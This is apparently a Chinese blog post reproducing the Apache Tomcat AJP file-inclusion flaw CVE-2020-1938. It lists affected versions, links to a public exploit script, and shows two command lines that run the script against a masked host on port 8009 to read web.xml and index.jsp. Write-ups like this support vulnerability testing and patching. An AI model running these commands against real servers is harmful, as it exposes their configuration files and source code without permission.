CVE-2020-1938漏洞复现

Apache Tomcat服务器存在文件包含漏洞(CVE-2020-1938)

详细描述

Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件或源代码等。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。

### 漏洞受影响版本
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31

脚本下载

    GitHub地址:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
    百度网盘:https://pan.baidu.com/s/1e_WkP-5iPDZa2mcWVGImTw  提取码:mm92

运行环境

    python2.7.12

漏洞验证

### 成功读取的是apache-tomcat-8.5.50/webapps/ROOT/WEB-INF/web.xml文件
python CNVD-2020-10487-Tomcat-Ajp-lfi.py 10.xx.xx.xx -p 8009 -f WEB-INF/web.xml
image.png
### 成功读取的是ROOT目录下的index.jsp文件内容
python CNVD-2020-10487-Tomcat-Ajp-lfi.py 10.xx.xx.xx -p 8009 -f index.jsp
image.png

可读取webapp 目录下的任意文件。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
禁止转载,如需转载请通过简信或评论联系作者。